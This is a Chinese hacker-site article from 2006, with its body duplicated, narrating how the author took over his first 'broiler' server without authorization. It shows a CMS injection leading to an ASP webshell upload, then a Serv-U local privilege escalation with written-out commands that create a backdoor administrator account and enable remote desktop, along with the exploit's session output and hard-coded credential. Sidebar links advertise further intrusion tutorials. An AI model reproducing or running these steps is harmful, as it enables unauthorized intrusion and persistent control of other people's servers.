黑客口述:我的第一台3389肉鸡的经历
发布时间:2006-07-22 16:09:43 来源: 网友评论 0 条 条件:破机器一个,坏蛋一个(本人),破电信ADSL2M,垃圾时间N多
‘()’里面的全是以后知道的,做个注解吧!
菜鸟获取肉鸡,现在好象都是扫描4899。sa口令等,其实这样很不好,为什么呢?大家的网络都不是特别好,基本上扫不出肉鸡呵呵。我的第一个肉鸡不是扫描拿的,1.网络不行运气不行扫不到2.工具不对
我的第一个WEBSHELL,是天意程序注入漏洞,拿到的,后台广告编辑那里可以直接上传ASP木马(一个木马用了3天才学会如何操控WEBSHELL,第一个WEBSHELL拿到的时候,根本不知道提权是什么概念!放着没几天就丢了,呵呵。)
第2个WEBSHELL,也是天意注入```(那时候不容易啊,找了3天才找到第2个````中间碰到以后学到的MD5,==)
第2个WEBSHELL拿到了,就去网上各大黑客站点搜索:提权2个字`看了N个教程```用FTP。EXE和3389.EXE成功的开启了3389和创建管理员号!呵呵````(补充知识:其实管理员是用PCANYWHERE连接的,我不知道什么是PCANYWHERE就知道别人说什么3389肉鸡,我就当好人,给他开了3389呵呵。当时serv-u本地提权的漏洞还不是很普及,一般拿下webshell很容易成功,呵呵,cmd.exe和WScriptShell默认都可以调用,以后就难了,很多都是BT设置的主机!其实大家入侵的时候,用海洋木马比老兵要好,我感觉他调用命令,浏览文件好点)
我来演示下怎么serv-u本地提权
E:/qipei/cn/ftp.exe "net user 3800cc 3800cc /add"(意识就是以SERV-U本地管理的权限运行那个加用户的命令,SERV-U默认的SYSTEM权限哦!,加一个用户为3800cc密码3800cc的USER权限的用户,最下面220一般是成功的代表)
USER LocalAdministrator
PASS #l@$ak#.lk;0@P
SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
USER haxorcitos
PASS whitex0r
<230 User logged in, proceed.
******************************************************
[+] Now Executing: net user 3800cc 3800cc /add
<220 Domain deleted
******************************************************
接下去几步没什么大不了,
E:/qipei/cn/ftp.exe "net localgroup administrators 3800cc /add"
(把3800cc这个用户加为管理员)
还有
E:/qipei/cn/ftp.exe "E:/qipei/cn/3389.exe"
(运行E:/qipei/cn/3389.exe这个开3389的软件,假设已经开了,就不用运行了!直接连上!3389端口是可以修改的,海洋2006可以读取服务器相关数据
(系统参数,系统磁盘,站点文件夹,终端端口&自动登录)明白了吧!)
最后等待服务器重起,连上3389。这就是我的第一台肉鸡!
接下来第一台肉鸡陪了我有3个月,管理员其实很菜,删了我的号,我再到WEBSJELL里建立,来来往往,后来管理员真的疯了一气之下,找了个高手修补了漏洞,我的第一个鸡就飞了。
‘()’里面的全是以后知道的,做个注解吧!
菜鸟获取肉鸡,现在好象都是扫描4899。sa口令等,其实这样很不好,为什么呢?大家的网络都不是特别好,基本上扫不出肉鸡呵呵。我的第一个肉鸡不是扫描拿的,1.网络不行运气不行扫不到2.工具不对
我的第一个WEBSHELL,是天意程序注入漏洞,拿到的,后台广告编辑那里可以直接上传ASP木马(一个木马用了3天才学会如何操控WEBSHELL,第一个WEBSHELL拿到的时候,根本不知道提权是什么概念!放着没几天就丢了,呵呵。)
第2个WEBSHELL,也是天意注入```(那时候不容易啊,找了3天才找到第2个````中间碰到以后学到的MD5,==)
第2个WEBSHELL拿到了,就去网上各大黑客站点搜索:提权2个字`看了N个教程```用FTP。EXE和3389.EXE成功的开启了3389和创建管理员号!呵呵````(补充知识:其实管理员是用PCANYWHERE连接的,我不知道什么是PCANYWHERE就知道别人说什么3389肉鸡,我就当好人,给他开了3389呵呵。当时serv-u本地提权的漏洞还不是很普及,一般拿下webshell很容易成功,呵呵,cmd.exe和WScriptShell默认都可以调用,以后就难了,很多都是BT设置的主机!其实大家入侵的时候,用海洋木马比老兵要好,我感觉他调用命令,浏览文件好点)
我来演示下怎么serv-u本地提权
E:/qipei/cn/ftp.exe "net user 3800cc 3800cc /add"(意识就是以SERV-U本地管理的权限运行那个加用户的命令,SERV-U默认的SYSTEM权限哦!,加一个用户为3800cc密码3800cc的USER权限的用户,最下面220一般是成功的代表)
USER LocalAdministrator
PASS #l@$ak#.lk;0@P
SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
USER haxorcitos
PASS whitex0r
<230 User logged in, proceed.
******************************************************
[+] Now Executing: net user 3800cc 3800cc /add
<220 Domain deleted
******************************************************
接下去几步没什么大不了,
E:/qipei/cn/ftp.exe "net localgroup administrators 3800cc /add"
(把3800cc这个用户加为管理员)
还有
E:/qipei/cn/ftp.exe "E:/qipei/cn/3389.exe"
(运行E:/qipei/cn/3389.exe这个开3389的软件,假设已经开了,就不用运行了!直接连上!3389端口是可以修改的,海洋2006可以读取服务器相关数据
(系统参数,系统磁盘,站点文件夹,终端端口&自动登录)明白了吧!)
最后等待服务器重起,连上3389。这就是我的第一台肉鸡!
接下来第一台肉鸡陪了我有3个月,管理员其实很菜,删了我的号,我再到WEBSJELL里建立,来来往往,后来管理员真的疯了一气之下,找了个高手修补了漏洞,我的第一个鸡就飞了。
- 推荐阅讯
- 推荐: udf's hacking in mysql5
- 了解详情 密码破解速度全面披露
- NTFS文件流与WinRAR联手打造免杀木马
- 黑客经验谈 从零开始自检系统的漏洞
- 教你如何打造一个黑客也读不懂的密码
- MSHTA漏洞为黑客大开远程控制之门
- 案例教程:黑客教你编写强力蓝屏炸弹
- 黑客新技术 灰鸽子巧妙利用全攻略
- 入侵网站的各种漏洞的利用和搜索参数
- 实例讲解:蓝雨设计整站SQL注入漏洞
- 阅读排行
- 1.千里之行始于足下 黑客技术基础知识讲解
- 2.黑客必学的六条系统命令
- 3.密码攻略 黑客亲手打造QQ密码破解器
- 4.王者风范 2分钟入侵网站全程实录
- 5.黑客新技术 灰鸽子巧妙利用全攻略
- 6.秘籍:网吧入侵全攻略
- 7.菜鸟必看:学习黑客技术的基本环境
- 8.人小鬼大的黑客工具——QQ远控精灵
- 9.先做黑客再做网管:二.黑客应掌握的基本技能
- 10.先做黑客再做网管:一.
- 专题教程
- Windows Server-Windows Server文档-Windows Server新闻-Windows Ser PostgreSQL-PostgreSQL文档-PostgreSQL新闻-PostgreSQL专家
- WebLogic-WebLogic文档-WebLogic新闻-WebLogic专家 FreeBSD-FreeBSD文档-FreeBSD新闻-FreeBSD专家
- Linux-内核 GUI KDE Gnome DNS FTP 安全 安装-Linux专区 Windows-AD IIS ServerCore 虚拟化 安全 HPC-Windows专区
- 大话G游 专题:手机病毒揭密
- ARP攻击防范与解决方案 路由故障处理手册